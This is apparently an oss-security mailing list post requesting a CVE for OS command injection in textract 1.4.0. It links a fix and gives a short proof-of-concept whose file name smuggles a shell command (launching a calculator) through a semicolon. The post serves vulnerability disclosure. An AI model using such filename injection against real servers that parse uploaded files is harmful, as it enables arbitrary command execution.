Date: Thu, 20 Oct 2016 17:40:50 -0400 From: Pierre Ernst <pernst@...esforce.com> To: oss-security@...ts.openwall.com Subject: CVE request - textract 1.4.0 - OS Command Injection The Python textract component ( https://github.com/deanmalmgren/textract/tree/v1.4.0) is vulnerable to OS command injection. this fork contains a fix: https://github.com/pierre-ernst/textract Parsing a file with a malicious name leads to arbitrary OS command injection, this is especially risky when parsing user-supplied files on a server (e.g. uploaded files) PoC: import textract import sys import os # create a file with a malicious name and arbitrary content fileName = './test";gnome-calculator;#.pdf' file = open(fileName,'w+') file.write('Pierre Ernst, Salesforce') file.close() # parse newly created file text = textract.process(fileName) print text # cleanup os.remove(fileName); -- Pierre Ernst Salesforce
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.